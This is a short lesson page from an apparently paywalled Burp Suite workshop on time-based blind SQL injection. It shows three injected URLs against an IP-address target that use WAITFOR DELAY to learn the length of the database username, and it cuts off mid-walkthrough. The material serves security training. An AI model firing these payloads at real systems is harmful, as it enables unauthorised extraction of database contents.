C1L6: Blind SQL Injection Testing

Please purchase the course before starting the lesson.

BLIND SQL INJECTION TESTING Time-Based BLIND SQL INJECTION - EXTRACT DATABASE USER 3 - Total Characters http://54.213.252.28/bookdetail.aspx?id=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'-- http://54.213.252.28/bookdetail.aspx?id=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'-- http://54.213.252.28/bookdetail.aspx?id=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (Ok, the username is 3 chars long - it waited 10 seconds) Let's go for a quick check to see if [...]

Back to: Burp Suite Workshop